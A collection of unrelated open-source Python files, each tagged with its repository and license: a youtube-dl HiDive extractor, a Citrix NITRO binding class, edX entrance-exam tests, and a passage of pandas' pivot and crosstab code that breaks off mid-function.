def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
title, key = mobj.group('title', 'key')
video_id = '%s/%s' % (title, key)
settings = self._download_json(
'https://www.hidive.com/play/settings', video_id,
data=urlencode_postdata({
'Title': title,
'Key': key,
}))
restriction = settings.get('restrictionReason')
if restriction == 'RegionRestricted':
self.raise_geo_restricted()
if restriction and restriction != 'None':
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, restriction), expected=True)
formats = []
subtitles = {}
for rendition_id, rendition in settings['renditions'].items():
bitrates = rendition.get('bitrates')
if not isinstance(bitrates, dict):
continue
m3u8_url = bitrates.get('hls')
if not isinstance(m3u8_url, compat_str):
continue
formats.extend(self._extract_m3u8_formats(
m3u8_url, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id='%s-hls' % rendition_id, fatal=False))
cc_files = rendition.get('ccFiles')
if not isinstance(cc_files, list):
continue
for cc_file in cc_files:
if not isinstance(cc_file, list) or len(cc_file) < 3:
continue
cc_lang = cc_file[0]
cc_url = cc_file[2]
if not isinstance(cc_lang, compat_str) or not isinstance(
cc_url, compat_str):
continue
subtitles.setdefault(cc_lang, []).append({
'url': cc_url,
})
season_number = int_or_none(self._search_regex(
r's(\d+)', key, 'season number', default=None))
episode_number = int_or_none(self._search_regex(
r'e(\d+)', key, 'episode number', default=None))
return {
'id': video_id,
'title': video_id,
'subtitles': subtitles,
'formats': formats,
'series': title,
'season_number': season_number,
'episode_number': episode_number,
}
| steebchen/youtube-dl | youtube_dl/extractor/hidive.py | Python | unlicense | 3,324 |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class rnat6_binding(base_resource):
""" Binding class showing the resources that can be bound to rnat6_binding.
"""
def __init__(self) :
self._name = ""
self.rnat6_nsip6_binding = []
@property
def name(self) :
"""Name of the RNAT6 rule whose details you want to display.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of the RNAT6 rule whose details you want to display.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def rnat6_nsip6_bindings(self) :
"""nsip6 that can be bound to rnat6.
"""
try :
return self._rnat6_nsip6_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(rnat6_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.rnat6_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(self, service, name) :
""" Use this API to fetch rnat6_binding resource.
"""
try :
if type(name) is not list :
obj = rnat6_binding()
obj.name = name
response = obj.get_resource(service)
else :
if name and len(name) > 0 :
obj = [rnat6_binding() for _ in range(len(name))]
for i in range(len(name)) :
obj[i].name = name[i];
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class rnat6_binding_response(base_response) :
def __init__(self, length=1) :
self.rnat6_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.rnat6_binding = [rnat6_binding() for _ in range(length)]
| mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/config/network/rnat6_binding.py | Python | apache-2.0 | 3,410 |
from rest_framework import generics
| mattdennewitz/generator-mdtz-fluxible | generators/djapi/templates/views.py | Python | mit | 36 |
"""
Test module for Entrance Exams AJAX callback handler workflows
"""
import json
from mock import patch
from django.conf import settings
from django.contrib.auth.models import User
from django.test.client import RequestFactory
from contentstore.tests.utils import AjaxEnabledTestClient, CourseTestCase
from contentstore.utils import reverse_url
from contentstore.views.entrance_exam import create_entrance_exam, update_entrance_exam, delete_entrance_exam,\
add_entrance_exam_milestone, remove_entrance_exam_milestone_reference
from contentstore.views.helpers import GRADER_TYPES
from models.settings.course_grading import CourseGradingModel
from models.settings.course_metadata import CourseMetadata
from opaque_keys.edx.keys import UsageKey
from student.tests.factories import UserFactory
from util import milestones_helpers
from xmodule.modulestore.django import modulestore
from contentstore.views.helpers import create_xblock
from milestones.tests.utils import MilestonesTestCaseMixin
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
class EntranceExamHandlerTests(CourseTestCase, MilestonesTestCaseMixin):
"""
Base test class for create, save, and delete
"""
def setUp(self):
"""
Shared scaffolding for individual test runs
"""
super(EntranceExamHandlerTests, self).setUp()
self.course_key = self.course.id
self.usage_key = self.course.location
self.course_url = '/course/{}'.format(unicode(self.course.id))
self.exam_url = '/course/{}/entrance_exam/'.format(unicode(self.course.id))
self.milestone_relationship_types = milestones_helpers.get_milestone_relationship_types()
def test_entrance_exam_milestone_addition(self):
"""
Unit Test: test addition of entrance exam milestone content
"""
parent_locator = unicode(self.course.location)
created_block = create_xblock(
parent_locator=parent_locator,
user=self.user,
category='chapter',
display_name=('Entrance Exam'),
is_entrance_exam=True
)
add_entrance_exam_milestone(self.course.id, created_block)
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
unicode(created_block.location),
self.milestone_relationship_types['FULFILLS']
)
self.assertTrue(len(content_milestones))
self.assertEqual(len(milestones_helpers.get_course_milestones(self.course.id)), 1)
def test_entrance_exam_milestone_removal(self):
"""
Unit Test: test removal of entrance exam milestone content
"""
parent_locator = unicode(self.course.location)
created_block = create_xblock(
parent_locator=parent_locator,
user=self.user,
category='chapter',
display_name=('Entrance Exam'),
is_entrance_exam=True
)
add_entrance_exam_milestone(self.course.id, created_block)
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
unicode(created_block.location),
self.milestone_relationship_types['FULFILLS']
)
self.assertEqual(len(content_milestones), 1)
user = UserFactory()
request = RequestFactory().request()
request.user = user
remove_entrance_exam_milestone_reference(request, self.course.id)
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
unicode(created_block.location),
self.milestone_relationship_types['FULFILLS']
)
self.assertEqual(len(content_milestones), 0)
def test_contentstore_views_entrance_exam_post(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post
"""
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
# Reload the test course now that the exam module has been added
self.course = modulestore().get_course(self.course.id)
metadata = CourseMetadata.fetch_all(self.course)
self.assertTrue(metadata['entrance_exam_enabled'])
self.assertIsNotNone(metadata['entrance_exam_minimum_score_pct'])
self.assertIsNotNone(metadata['entrance_exam_id']['value'])
self.assertTrue(len(milestones_helpers.get_course_milestones(unicode(self.course.id))))
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
metadata['entrance_exam_id']['value'],
self.milestone_relationship_types['FULFILLS']
)
self.assertTrue(len(content_milestones))
def test_contentstore_views_entrance_exam_post_new_sequential_confirm_grader(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post
"""
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
# Reload the test course now that the exam module has been added
self.course = modulestore().get_course(self.course.id)
# Add a new child sequential to the exam module
# Confirm that the grader type is 'Entrance Exam'
chapter_locator_string = json.loads(resp.content).get('locator')
# chapter_locator = UsageKey.from_string(chapter_locator_string)
seq_data = {
'category': "sequential",
'display_name': "Entrance Exam Subsection",
'parent_locator': chapter_locator_string,
}
resp = self.client.ajax_post(reverse_url('xblock_handler'), seq_data)
seq_locator_string = json.loads(resp.content).get('locator')
seq_locator = UsageKey.from_string(seq_locator_string)
section_grader_type = CourseGradingModel.get_section_grader_type(seq_locator)
self.assertEqual(GRADER_TYPES['ENTRANCE_EXAM'], section_grader_type['graderType'])
def test_contentstore_views_entrance_exam_get(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get
"""
resp = self.client.post(
self.exam_url,
{'entrance_exam_minimum_score_pct': settings.ENTRANCE_EXAM_MIN_SCORE_PCT},
http_accept='application/json'
)
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
def test_contentstore_views_entrance_exam_delete(self):
"""
Unit Test: test_contentstore_views_entrance_exam_delete
"""
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
resp = self.client.delete(self.exam_url)
self.assertEqual(resp.status_code, 204)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 404)
user = User.objects.create(
username='test_user',
email='test_user@edx.org',
is_active=True,
)
user.set_password('test')
user.save()
milestones = milestones_helpers.get_course_milestones(unicode(self.course_key))
self.assertEqual(len(milestones), 1)
milestone_key = '{}.{}'.format(milestones[0]['namespace'], milestones[0]['name'])
paths = milestones_helpers.get_course_milestones_fulfillment_paths(
unicode(self.course_key),
milestones_helpers.serialize_user(user)
)
# What we have now is a course milestone requirement and no valid fulfillment
# paths for the specified user. The LMS is going to have to ignore this situation,
# because we can't confidently prevent it from occuring at some point in the future.
# milestone_key_1 =
self.assertEqual(len(paths[milestone_key]), 0)
# Re-adding an entrance exam to the course should fix the missing link
# It wipes out any old entrance exam artifacts and inserts a new exam course chapter/module
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
# Confirm that we have only one Entrance Exam grader after re-adding the exam (validates SOL-475)
graders = CourseGradingModel.fetch(self.course_key).graders
count = 0
for grader in graders:
if grader['type'] == GRADER_TYPES['ENTRANCE_EXAM']:
count += 1
self.assertEqual(count, 1)
def test_contentstore_views_entrance_exam_delete_bogus_course(self):
"""
Unit Test: test_contentstore_views_entrance_exam_delete_bogus_course
"""
resp = self.client.delete('/course/bad/course/key/entrance_exam')
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_get_bogus_course(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get_bogus_course
"""
resp = self.client.get('/course/bad/course/key/entrance_exam')
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_get_bogus_exam(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get_bogus_exam
"""
resp = self.client.post(
self.exam_url,
{'entrance_exam_minimum_score_pct': '50'},
http_accept='application/json'
)
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
self.course = modulestore().get_course(self.course.id)
# Should raise an ItemNotFoundError and return a 404
updated_metadata = {'entrance_exam_id': 'i4x://org.4/course_4/chapter/ed7c4c6a4d68409998e2c8554c4629d1'}
CourseMetadata.update_from_dict(
updated_metadata,
self.course,
self.user,
)
self.course = modulestore().get_course(self.course.id)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 404)
# Should raise an InvalidKeyError and return a 404
updated_metadata = {'entrance_exam_id': '123afsdfsad90f87'}
CourseMetadata.update_from_dict(
updated_metadata,
self.course,
self.user,
)
self.course = modulestore().get_course(self.course.id)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 404)
def test_contentstore_views_entrance_exam_post_bogus_course(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post_bogus_course
"""
resp = self.client.post(
'/course/bad/course/key/entrance_exam',
{},
http_accept='application/json'
)
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_post_invalid_http_accept(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post_invalid_http_accept
"""
resp = self.client.post(
'/course/bad/course/key/entrance_exam',
{},
http_accept='text/html'
)
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_get_invalid_user(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get_invalid_user
"""
user = User.objects.create(
username='test_user',
email='test_user@edx.org',
is_active=True,
)
user.set_password('test')
user.save()
self.client = AjaxEnabledTestClient()
self.client.login(username='test_user', password='test')
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 403)
def test_contentstore_views_entrance_exam_unsupported_method(self):
"""
Unit Test: test_contentstore_views_entrance_exam_unsupported_method
"""
resp = self.client.put(self.exam_url)
self.assertEqual(resp.status_code, 405)
def test_entrance_exam_view_direct_missing_score_setting(self):
"""
Unit Test: test_entrance_exam_view_direct_missing_score_setting
"""
user = UserFactory()
user.is_staff = True
request = RequestFactory()
request.user = user
resp = create_entrance_exam(request, self.course.id, None)
self.assertEqual(resp.status_code, 201)
@patch.dict('django.conf.settings.FEATURES', {'ENTRANCE_EXAMS': False})
def test_entrance_exam_feature_flag_gating(self):
user = UserFactory()
user.is_staff = True
request = RequestFactory()
request.user = user
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 400)
resp = create_entrance_exam(request, self.course.id, None)
self.assertEqual(resp.status_code, 400)
resp = delete_entrance_exam(request, self.course.id)
self.assertEqual(resp.status_code, 400)
# No return, so we'll just ensure no exception is thrown
update_entrance_exam(request, self.course.id, {})
| solashirai/edx-platform | cms/djangoapps/contentstore/views/tests/test_entrance_exam.py | Python | agpl-3.0 | 13,750 |
from __future__ import annotations
from typing import (
TYPE_CHECKING,
Callable,
Hashable,
Sequence,
cast,
)
import numpy as np
from pandas._typing import (
AggFuncType,
AggFuncTypeBase,
AggFuncTypeDict,
IndexLabel,
)
from pandas.util._decorators import (
Appender,
Substitution,
)
from pandas.core.dtypes.cast import maybe_downcast_to_dtype
from pandas.core.dtypes.common import (
is_integer_dtype,
is_list_like,
is_nested_list_like,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
import pandas.core.common as com
from pandas.core.frame import _shared_docs
from pandas.core.groupby import Grouper
from pandas.core.indexes.api import (
Index,
MultiIndex,
get_objs_combined_axis,
)
from pandas.core.reshape.concat import concat
from pandas.core.reshape.util import cartesian_product
from pandas.core.series import Series
if TYPE_CHECKING:
from pandas import DataFrame
# Note: We need to make sure `frame` is imported before `pivot`, otherwise
# _shared_docs['pivot_table'] will not yet exist. TODO: Fix this dependency
@Substitution("\ndata : DataFrame")
@Appender(_shared_docs["pivot_table"], indents=1)
def pivot_table(
data: DataFrame,
values=None,
index=None,
columns=None,
aggfunc: AggFuncType = "mean",
fill_value=None,
margins=False,
dropna=True,
margins_name="All",
observed=False,
sort=True,
) -> DataFrame:
index = _convert_by(index)
columns = _convert_by(columns)
if isinstance(aggfunc, list):
pieces: list[DataFrame] = []
keys = []
for func in aggfunc:
_table = __internal_pivot_table(
data,
values=values,
index=index,
columns=columns,
fill_value=fill_value,
aggfunc=func,
margins=margins,
dropna=dropna,
margins_name=margins_name,
observed=observed,
sort=sort,
)
pieces.append(_table)
keys.append(getattr(func, "__name__", func))
table = concat(pieces, keys=keys, axis=1)
return table.__finalize__(data, method="pivot_table")
table = __internal_pivot_table(
data,
values,
index,
columns,
aggfunc,
fill_value,
margins,
dropna,
margins_name,
observed,
sort,
)
return table.__finalize__(data, method="pivot_table")
def __internal_pivot_table(
data: DataFrame,
values,
index,
columns,
aggfunc: AggFuncTypeBase | AggFuncTypeDict,
fill_value,
margins: bool,
dropna: bool,
margins_name: str,
observed: bool,
sort: bool,
) -> DataFrame:
"""
Helper of :func:`pandas.pivot_table` for any non-list ``aggfunc``.
"""
keys = index + columns
values_passed = values is not None
if values_passed:
if is_list_like(values):
values_multi = True
values = list(values)
else:
values_multi = False
values = [values]
# GH14938 Make sure value labels are in data
for i in values:
if i not in data:
raise KeyError(i)
to_filter = []
for x in keys + values:
if isinstance(x, Grouper):
x = x.key
try:
if x in data:
to_filter.append(x)
except TypeError:
pass
if len(to_filter) < len(data.columns):
data = data[to_filter]
else:
values = data.columns
for key in keys:
try:
values = values.drop(key)
except (TypeError, ValueError, KeyError):
pass
values = list(values)
grouped = data.groupby(keys, observed=observed, sort=sort)
agged = grouped.agg(aggfunc)
if dropna and isinstance(agged, ABCDataFrame) and len(agged.columns):
agged = agged.dropna(how="all")
# gh-21133
# we want to down cast if
# the original values are ints
# as we grouped with a NaN value
# and then dropped, coercing to floats
for v in values:
if (
v in data
and is_integer_dtype(data[v])
and v in agged
and not is_integer_dtype(agged[v])
):
if isinstance(agged[v], ABCDataFrame):
# exclude DataFrame case bc maybe_downcast_to_dtype expects
# ArrayLike
# TODO: why does test_pivot_table_doctest_case fail if
# we don't do this apparently-unnecessary setitem?
agged[v] = agged[v]
else:
agged[v] = maybe_downcast_to_dtype(agged[v], data[v].dtype)
table = agged
# GH17038, this check should only happen if index is defined (not None)
if table.index.nlevels > 1 and index:
# Related GH #17123
# If index_names are integers, determine whether the integers refer
# to the level position or name.
index_names = agged.index.names[: len(index)]
to_unstack = []
for i in range(len(index), len(keys)):
name = agged.index.names[i]
if name is None or name in index_names:
to_unstack.append(i)
else:
to_unstack.append(name)
table = agged.unstack(to_unstack)
if not dropna:
if isinstance(table.index, MultiIndex):
m = MultiIndex.from_arrays(
cartesian_product(table.index.levels), names=table.index.names
)
table = table.reindex(m, axis=0)
if isinstance(table.columns, MultiIndex):
m = MultiIndex.from_arrays(
cartesian_product(table.columns.levels), names=table.columns.names
)
table = table.reindex(m, axis=1)
if isinstance(table, ABCDataFrame):
table = table.sort_index(axis=1)
if fill_value is not None:
_table = table.fillna(fill_value, downcast="infer")
assert _table is not None # needed for mypy
table = _table
if margins:
if dropna:
data = data[data.notna().all(axis=1)]
table = _add_margins(
table,
data,
values,
rows=index,
cols=columns,
aggfunc=aggfunc,
observed=dropna,
margins_name=margins_name,
fill_value=fill_value,
)
# discard the top level
if values_passed and not values_multi and table.columns.nlevels > 1:
table = table.droplevel(0, axis=1)
if len(index) == 0 and len(columns) > 0:
table = table.T
# GH 15193 Make sure empty columns are removed if dropna=True
if isinstance(table, ABCDataFrame) and dropna:
table = table.dropna(how="all", axis=1)
return table
def _add_margins(
table: DataFrame | Series,
data,
values,
rows,
cols,
aggfunc,
observed=None,
margins_name: str = "All",
fill_value=None,
):
if not isinstance(margins_name, str):
raise ValueError("margins_name argument must be a string")
msg = f'Conflicting name "{margins_name}" in margins'
for level in table.index.names:
if margins_name in table.index.get_level_values(level):
raise ValueError(msg)
grand_margin = _compute_grand_margin(data, values, aggfunc, margins_name)
if table.ndim == 2:
# i.e. DataFrame
for level in table.columns.names[1:]:
if margins_name in table.columns.get_level_values(level):
raise ValueError(msg)
key: str | tuple[str, ...]
if len(rows) > 1:
key = (margins_name,) + ("",) * (len(rows) - 1)
else:
key = margins_name
if not values and isinstance(table, ABCSeries):
# If there are no values and the table is a series, then there is only
# one column in the data. Compute grand margin and return it.
return table.append(Series({key: grand_margin[margins_name]}))
elif values:
marginal_result_set = _generate_marginal_results(
table, data, values, rows, cols, aggfunc, observed, margins_name
)
if not isinstance(marginal_result_set, tuple):
return marginal_result_set
result, margin_keys, row_margin = marginal_result_set
else:
# no values, and table is a DataFrame
assert isinstance(table, ABCDataFrame)
marginal_result_set = _generate_marginal_results_without_values(
table, data, rows, cols, aggfunc, observed, margins_name
)
if not isinstance(marginal_result_set, tuple):
return marginal_result_set
result, margin_keys, row_margin = marginal_result_set
row_margin = row_margin.reindex(result.columns, fill_value=fill_value)
# populate grand margin
for k in margin_keys:
if isinstance(k, str):
row_margin[k] = grand_margin[k]
else:
row_margin[k] = grand_margin[k[0]]
from pandas import DataFrame
margin_dummy = DataFrame(row_margin, columns=[key]).T
row_names = result.index.names
# check the result column and leave floats
for dtype in set(result.dtypes):
cols = result.select_dtypes([dtype]).columns
margin_dummy[cols] = margin_dummy[cols].apply(
maybe_downcast_to_dtype, args=(dtype,)
)
result = result.append(margin_dummy)
result.index.names = row_names
return result
def _compute_grand_margin(data, values, aggfunc, margins_name: str = "All"):
if values:
grand_margin = {}
for k, v in data[values].items():
try:
if isinstance(aggfunc, str):
grand_margin[k] = getattr(v, aggfunc)()
elif isinstance(aggfunc, dict):
if isinstance(aggfunc[k], str):
grand_margin[k] = getattr(v, aggfunc[k])()
else:
grand_margin[k] = aggfunc[k](v)
else:
grand_margin[k] = aggfunc(v)
except TypeError:
pass
return grand_margin
else:
return {margins_name: aggfunc(data.index)}
def _generate_marginal_results(
table, data, values, rows, cols, aggfunc, observed, margins_name: str = "All"
):
if len(cols) > 0:
# need to "interleave" the margins
table_pieces = []
margin_keys = []
def _all_key(key):
return (key, margins_name) + ("",) * (len(cols) - 1)
if len(rows) > 0:
margin = data[rows + values].groupby(rows, observed=observed).agg(aggfunc)
cat_axis = 1
for key, piece in table.groupby(level=0, axis=cat_axis, observed=observed):
all_key = _all_key(key)
# we are going to mutate this, so need to copy!
piece = piece.copy()
piece[all_key] = margin[key]
table_pieces.append(piece)
margin_keys.append(all_key)
else:
from pandas import DataFrame
cat_axis = 0
for key, piece in table.groupby(level=0, axis=cat_axis, observed=observed):
if len(cols) > 1:
all_key = _all_key(key)
else:
all_key = margins_name
table_pieces.append(piece)
# GH31016 this is to calculate margin for each group, and assign
# corresponded key as index
transformed_piece = DataFrame(piece.apply(aggfunc)).T
transformed_piece.index = Index([all_key], name=piece.index.name)
# append piece for margin into table_piece
table_pieces.append(transformed_piece)
margin_keys.append(all_key)
result = concat(table_pieces, axis=cat_axis)
if len(rows) == 0:
return result
else:
result = table
margin_keys = table.columns
if len(cols) > 0:
row_margin = data[cols + values].groupby(cols, observed=observed).agg(aggfunc)
row_margin = row_margin.stack()
# slight hack
new_order = [len(cols)] + list(range(len(cols)))
row_margin.index = row_margin.index.reorder_levels(new_order)
else:
row_margin = Series(np.nan, index=result.columns)
return result, margin_keys, row_margin
def _generate_marginal_results_without_values(
table: DataFrame, data, rows, cols, aggfunc, observed, margins_name: str = "All"
):
if len(cols) > 0:
# need to "interleave" the margins
margin_keys: list | Index = []
def _all_key():
if len(cols) == 1:
return margins_name
return (margins_name,) + ("",) * (len(cols) - 1)
if len(rows) > 0:
margin = data[rows].groupby(rows, observed=observed).apply(aggfunc)
all_key = _all_key()
table[all_key] = margin
result = table
margin_keys.append(all_key)
else:
margin = data.groupby(level=0, axis=0, observed=observed).apply(aggfunc)
all_key = _all_key()
table[all_key] = margin
result = table
margin_keys.append(all_key)
return result
else:
result = table
margin_keys = table.columns
if len(cols):
row_margin = data[cols].groupby(cols, observed=observed).apply(aggfunc)
else:
row_margin = Series(np.nan, index=result.columns)
return result, margin_keys, row_margin
def _convert_by(by):
if by is None:
by = []
elif (
is_scalar(by)
or isinstance(by, (np.ndarray, Index, ABCSeries, Grouper))
or callable(by)
):
by = [by]
else:
by = list(by)
return by
@Substitution("\ndata : DataFrame")
@Appender(_shared_docs["pivot"], indents=1)
def pivot(
data: DataFrame,
index: IndexLabel | None = None,
columns: IndexLabel | None = None,
values: IndexLabel | None = None,
) -> DataFrame:
if columns is None:
raise TypeError("pivot() missing 1 required argument: 'columns'")
columns_listlike = com.convert_to_list_like(columns)
if values is None:
if index is not None:
cols = com.convert_to_list_like(index)
else:
cols = []
append = index is None
# error: Unsupported operand types for + ("List[Any]" and "ExtensionArray")
# error: Unsupported left operand type for + ("ExtensionArray")
indexed = data.set_index(
cols + columns_listlike, append=append # type: ignore[operator]
)
else:
if index is None:
index_list = [Series(data.index, name=data.index.name)]
else:
index_list = [data[idx] for idx in com.convert_to_list_like(index)]
data_columns = [data[col] for col in columns_listlike]
index_list.extend(data_columns)
multiindex = MultiIndex.from_arrays(index_list)
if is_list_like(values) and not isinstance(values, tuple):
# Exclude tuple because it is seen as a single column name
values = cast(Sequence[Hashable], values)
indexed = data._constructor(
data[values]._values, index=multiindex, columns=values
)
else:
indexed = data._constructor_sliced(data[values]._values, index=multiindex)
return indexed.unstack(columns_listlike)
def crosstab(
index,
columns,
values=None,
rownames=None,
colnames=None,
aggfunc=None,
margins=False,
margins_name: str = "All",
dropna: bool = True,
normalize=False,
) -> DataFrame:
"""
Compute a simple cross tabulation of two (or more) factors. By default
computes a frequency table of the factors unless an array of values and an
aggregation function are passed.
Parameters
----------
index : array-like, Series, or list of arrays/Series
Values to group by in the rows.
columns : array-like, Series, or list of arrays/Series
Values to group by in the columns.
values : array-like, optional
Array of values to aggregate according to the factors.
Requires `aggfunc` be specified.
rownames : sequence, default None
If passed, must match number of row arrays passed.
colnames : sequence, default None
If passed, must match number of column arrays passed.
aggfunc : function, optional
If specified, requires `values` be specified as well.
margins : bool, default False
Add row/column margins (subtotals).
margins_name : str, default 'All'
Name of the row/column that will contain the totals
when margins is True.
dropna : bool, default True
Do not include columns whose entries are all NaN.
normalize : bool, {'all', 'index', 'columns'}, or {0,1}, default False
Normalize by dividing all values by the sum of values.
- If passed 'all' or `True`, will normalize over all values.
- If passed 'index' will normalize over each row.
- If passed 'columns' will normalize over each column.
- If margins is `True`, will also normalize margin values.
Returns
-------
DataFrame
Cross tabulation of the data.
See Also
--------
DataFrame.pivot : Reshape data based on column values.
pivot_table : Create a pivot table as a DataFrame.
Notes
-----
Any Series passed will have their name attributes used unless row or column
names for the cross-tabulation are specified.
Any input passed containing Categorical data will have **all** of its
categories included in the cross-tabulation, even if the actual data does
not contain any instances of a particular category.
In the event that there aren't overlapping indexes an empty DataFrame will
be returned.
Examples
--------
>>> a = np.array(["foo", "foo", "foo", "foo", "bar", "bar",
... "bar", "bar", "foo", "foo", "foo"], dtype=object)
>>> b = np.array(["one", "one", "one", "two", "one", "one",
... "one", "two", "two", "two", "one"], dtype=object)
>>> c = np.array(["dull", "dull", "shiny", "dull", "dull", "shiny",
... "shiny", "dull", "shiny", "shiny", "shiny"],
... dtype=object)
>>> pd.crosstab(a, [b, c], rownames=['a'], colnames=['b', 'c'])
b one two
c dull shiny dull shiny
a
bar 1 2 1 0
foo 2 2 1 2
Here 'c' and 'f' are not represented in the data and will not be
shown in the output because dropna is True by default. Set
dropna=False to preserve categories with no data.
>>> foo = pd.Categorical(['a', 'b'], categories=['a', 'b', 'c'])
>>> bar = pd.Categorical(['d', 'e'], categories=['d', 'e', 'f'])
>>> pd.crosstab(foo, bar)
col_0 d e
row_0
a 1 0
b 0 1
>>> pd.crosstab(foo, bar, dropna=False)
col_0 d e f
row_0
a 1 0 0
b 0 1 0
c 0 0 0
"""
if values is None and aggfunc is not None:
raise ValueError("aggfunc cannot be used without values.")
if values is not None and aggfunc is None:
raise ValueError("values cannot be used without an aggfunc.")
if not is_nested_list_like(index):
index = [index]
if not is_nested_list_like(columns):
columns = [columns]
common_idx = None
pass_objs = [x for x in index + columns if isinstance(x, (ABCSeries, ABCDataFrame))]
if pass_objs:
common_idx = get_objs_combined_axis(pass_objs, intersect=True, sort=False)
rownames = _get_names(index, rownames, prefix="row")
colnames = _get_names(columns, colnames, prefix="col")
# duplicate names mapped to unique names for pivot op
(
rownames_mapper,
unique_rownames,
colnames_mapper,
unique_colnames,
) = _build_names_mapper(rownames, colnames)
from pandas import DataFrame
data = {
**dict(zip(unique_rownames, index)),
**dict(zip(unique_colnames, columns)),
}
df = DataFrame(data, index=common_idx)
if values is None:
df["__dummy__"] = 0
kwargs = {"aggfunc": len, "fill_value": 0}
else:
df["__dummy__"] = values
kwargs = {"aggfunc": aggfunc}
table = df.pivot_table(
"__dummy__",
index=unique_rownames,
columns=unique_colnames,
margins=margins,
margins_name=margins_name,
dropna=dropna,
**kwargs,
)
# Post-process
if normalize is not False:
table = _normalize(
table, normalize=normalize, margins=margins, margins_name=margins_name
)
table = table.rename_axis(index=rownames_mapper, axis=0)
table = table.rename_axis(columns=colnames_mapper, axis=1)
return table
def _normalize(table, normalize, margins: bool, margins_name="All"):
if not isinstance(normalize, (bool, str)):
axis_subs = {0: "index", 1: "columns"}
try:
normalize = axis_subs[normalize]
except KeyError as err:
raise ValueError("Not a valid normalize argument") from err
if margins is False:
# Actual Normalizations
normalizers: dict[bool | str, Callable] = {
"all": lambda x: x / x.sum(axis=1).sum(axis=0),
"columns": lambda x: x / x.sum(),
"index": lambda x: x.div(x.sum(axis=1), axis=0),
}
normalizers[True] = normalizers["all"]
try:
f = normalizers[normalize]
except KeyError as err:
raise ValueError("Not a valid normalize argument") from err
table = f(table)
table = table.fillna(0)
elif margins is True:
# keep index and column of pivoted table
table_index = table.index
table_columns = table.columns
last_ind_or_col = table.iloc[-1, :].name
# check if margin name is not in (for MI cases) and not equal to last
# index/column and save the column and index margin
if (margins_name not in last_ind_or_col) & (margins_name != last_ind_or_col):
raise ValueError(f"{margins_name} not in pivoted DataFrame")
column_margin = table.iloc[:-1, -1]
index_margin = table.iloc[-1, :-1]
# keep the core table
table = table.iloc[:-1, :-1]
# Normalize core
table = _normalize(table, normalize=normalize, margins=False)
# Fix Margins
if normalize == "columns":
column_margin = column_margin / column_margin.sum()
table = concat([table, column_margin], axis=1)
table = table.fillna(0)
table.columns = table_columns
elif normalize == "index":
index_margin = index_margin / index_margin.sum()
table = table.append(index_margin)
table = table.fillna(0)
table.index = table_index
